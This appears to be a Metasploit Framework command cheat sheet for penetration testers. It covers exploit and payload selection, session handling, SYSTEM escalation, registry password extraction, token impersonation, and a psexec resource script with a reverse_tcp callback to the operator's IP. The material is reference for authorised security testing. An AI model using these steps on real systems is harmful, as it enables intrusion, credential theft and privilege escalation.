Metasploit Framework (MSF)
Start db
msfdb start
or
systemctl start postgresql
Start metasploit framework console
msfconsole
Select exploit
use <exploit>
Run exploit
run
or
exploit
Show options
show options
Show advanced options
show advanced
Set option
set <option> <value>
Set option (global)
setg <option> <value>
Show payloads
show payloads
Select payload
set payload <payload>
Show sessions
sessions -h
Interact with session
sessions <number>
Send session to background
background
The shell command will present you with a standard shell on the target system.
shell
Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.
getsystem
Show encoders
show encoders
Select encoder
set encoder <encoder>
Search for exploits
search <term>
Go back
back
Display help
help
Get info about current context?
info
show auxiliary
Just start listener
use exploit/multi/handler
Start job in background
run -j
Show jobs
jobs
This module suggests local meterpreter exploits that can be used.
use post/multi/recon/local_exploit_suggester
This module extracts the plain-text Windows user login password in Registry.
use post/windows/gather/credentials/windows_autologin
This module will login with the specified username/password and execute the supplied command as a hidden process.
use post/windows/manage/run_as
Upgrade shell to meterpreter shell
post/multi/manage/shell_to_meterpreter
Migrate to other (e.g. more stable) process
migrate
Get system info
sysinfo
Port forwarding
portfwd add -l <port> -r 127.0.0.1 -p <port>
Look for privileges like
SeImpersonatePrivilege
, SeDebugPrivilege
, etc.whoami /priv
Load incognito module and list available tokens
load incognito
list_tokens -g
Impersonate e.g.
BUILTIN\Administrators
impersonate_token "BUILTIN\Administrators"
Migrate to a process with the correct permission, to actually get the elevated permissions (token != permission).
ps
migrate <pid>
Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.
msfconsole -r demo.rc
use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>
Last modified 1yr ago